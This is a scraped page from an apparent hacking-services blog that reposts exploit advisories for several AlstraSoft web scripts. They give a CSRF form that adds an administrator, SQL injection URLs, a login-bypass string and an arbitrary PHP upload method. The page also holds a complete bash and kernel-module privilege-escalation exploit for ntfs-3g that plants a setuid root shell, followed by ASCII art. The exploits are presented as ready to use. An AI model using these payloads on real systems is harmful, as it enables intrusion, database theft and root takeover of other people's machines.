# # # # #
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/flippa-clone-marketplace.htm
# Demo: http://www.revou.com/flippa/
# Version: 4.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SubAdmin Management [Add]:
<html>
<body>
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox" value="">
<input type="submit" name="Sumbit" value="Save" class="stdButton">
</form>
</body>
</html>
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863585075
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: AlstraSoft Video Share Enterprise v4.72 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/videoshare.htm
# Demo: http://www.alstrahost.com/vs/
# Version: 4.72
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/album.php?UID=[SQL]
# http://localhost/[PATH]/uprofile.php?UID=[SQL]
# http://localhost/[PATH]/gmembers.php?urlkey=[URLKEY]&gid=[SQL]
# http://localhost/[PATH]/channel_detail.php?chid=[SQL]
# # # # #
# # # # #
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
# # # # #
# Exploit Title: Alstrasoft ProTaxi Enterprise v3.5 Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/protaxi-uber-clone.htm
# Demo: http://propertycarrots.com/taxi/public/user/signin
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# Register as a passenger member.
# http://localhost/[PATH]/public/user/signup
# My Profile upload photo.php
# http://localhost/[PATH]/public/user/profile
# Right click on the photo to find the .php path.
# http://localhost/[PATH]/public/uploads/....php
# If you upload pictures again .php is deleted.
# # # # #
# # # # #
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'@@@@@########@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++'';+'###''#'+'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####'#@@#;;'+@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;:,.``#@@@;`.:@',::'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;`......+;:;':..+:..'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'.;,.,;;;....;,.'.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';':..':......;.:,,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;..'`.,;:.`;,,.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..'..,#;..',.;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++''++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..':,....,',.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'::,,::::,,:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';..;'.,.,.;'..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::::::::::::,;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;';'':,:'';'';;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:::::::::::::::::::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+;';'''''';';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#,:::::;;;;;;;:::::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:;,,;.,'..'.;,,,.;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::;;;;;;;;;;;;;;:::,;@@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;.;:,'..'.,,'.';;@@@@@@@@@@@@@@@@@@@@@@@@@@@#::::;;;;;;;;;;;;'';;;;:::#@@@@@@@@@@#'::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;:,;::'::+,',':';;@@@@@@@@@@@@@@@@@@@@@@@@@@@::::;;;;;;;';;''''''';;::,'@@@@@@@@@+;;;:;;::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;;;;;'';;;;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@+,::;;''''';;;''''+''';;;:::#@@@@@@@;;;;;;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;::::::;.`.,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:::;'''''''';;''+''+++;;;;::+'@@@@@';;;;;;;;''+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@',,..,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::;'''''''''';;'''' `+'';;:;;:@@@@+';;;;;;'';:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@++':..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''''''';'';''''; :+'';;::;@@@@;;;;;;;''+'+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::.,,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;'''''''''';''''' ''''';::;@@@+''';;;+#++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;.,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;;''''''''';;''';':.;+'';;;:;@@@'''':;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##;;..:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;''++'''''''''';;''''''';;;;'@@@;''',:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;.,:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;''++''''''''';;;;'''''''''';@@#;'''.:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'...,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++++'''''''''''''+++++++':@@@''''::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:,.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''++++''''''''''''''++'''':@@@'''':;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@::''''+++++'''''''''''''''''::@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;'''+'+++''''''''''''''''':;@@@+''';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++'+++++++'''''''''''';:'@@@#''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++''''''''''''''';:#@@@@''';;:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;'''+++'+++''+'+''''''''';:#@@@@'+'';:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+++++++++''''''+'''''';:@@@@@+''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++++'''+'''''''';:@@@@@#''';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;''++++++++''''''''''''';:@@@@@@'''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''+++++'+++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++'++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''+++'+'+'''''''''''''';:@@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++''''''''''''''''';:#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''';''';;#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''''''';;+@@@@@#'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#''++++++''''''''';'''''';;;#@@@@''';:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++@@@@@@+''++'+++'''''''''';'''''';:'##';';;:;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'++####';;;'+;';;:'@@@@'''+''+++'''''''''';;''''';:::;;;;;;;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;::;;;;;'''''';:+@@@;''+''+++''''';''';;;''''';::;;;;;;'''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;:;;;;:;;;;;;;;'''''';:+@#'+'+''++'''''';''';;;;''''';:;;;;''+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;;;;;;;;:;;;;'''''::#'''''''+++'''';;''';;,;''''';:'''+##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;;;;;;;;;';;''''';;;,,;''''';;''''''''+''''';;;'''';;;;;;';;;;'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;''''''+'''''''''';'''''::'''''''+'''';;:;'''';;;;';+';;;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;'';;'';;;'++++++++''''''';;''';''''';''+'''';;,;'++'';;;;;+'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';'';'::::;::::'#@#+''''''+''';'';'''';''++''';;::;+++'';;;;'++';;;:##@@@@@@@@@@@@@@@@@@@@@@@#'';::;'#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'''';:::;;;;;;;;:'@@@++';;'+'';''''''';'++''''';,;'+++''';;;'''+':;::+@@@@@@@@@@@@@@@@@@@##';;;;;;;;;::#@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+''::;;;;;'''''';::#@#+'';;'+'';''''';''+''''';;:;'##++'';;;';#+'':;;;'##@@@@@@@@@@@@@@@#;;;;;;;;;;;:;::'@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;;;;;;''++++';;:'@#+';;''''''''';''+''#+';;;;''+##+''';;;;'#++';;;;;;+#@@@@@@@@@@#';;;;''''';;;;;;;::;@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;''++++++'';:'++''''+'';'';''++#@@+';;;;;++##++''''';:+@#+';;;;;;:::::;;;;:;;;;;;'''''''''';;;;::'@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;'+####+++''';;;;;;'++;'''''#+++@#+''';;'#@@#++'''''';:+@##+'';;;;;:;;;;;;;;;;';''''''''''''',:;;;#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;'';'+@@@@##++++'+''';;;'+'''''#@@@@@#'''';;'@@@@#@##+'+'';:'#@#+'''';;;;;;;;;;;'''''''''++++++'';';;;'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;;';;;'''+@@@@@@###+++++'+;:;'++'';'+@@@#@+''';;;+@@@@@@@@+++'';;;;'++'''';;;;;;;'''''''''+++#@@@@#++++'';;;@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;''';;'''+#@@@@@@@@###++####+''''+''''''''''''''';;#@@@@@@@@@#++'''''';;;:;;';;;::,;''''++++'';+@@@@@@#'++'';'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''''''#@@@@@@@@@@@########+++++++''''''''''''';;'@@@@@@@@@@@#+''''''''''''''';;;;:::##@@@@@@@@@@@@@@@@@@++'#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##+####@@@@@@@@@@@@@@@@@@@@@#'''#++''''''''''''';+@@@@@@@@@@@#++''''+++''''+'''';;;;::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''''+@@@@@@@@@@@@@@###++++++'''+++''';;;;;:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''#@@@@@@@@@@@@@@@@@@###+#+++++++'''';;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++++#####@@@@@@@@@@@@@@@@@@@@@#+######+++++'';;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+';'+@@@@@@@@@@@@@@@@@@@@@@@@@@@###@@@###+++'''':;;;:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++#+##++'';:;;;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####@++++''';;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+++'''''#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:##';;;@;';+@@';;;@;;;;'@@':'@';@''+@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# ' # @ + `@ # @` ,@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@, `@:'. .#` + @ ;#@` `,, ,`@ '` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; `@@ @@ . @ ` @@ :@ :#@@ :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#, @# @@ `## `.#@` :@ `@'@``` :@@@@@@@@
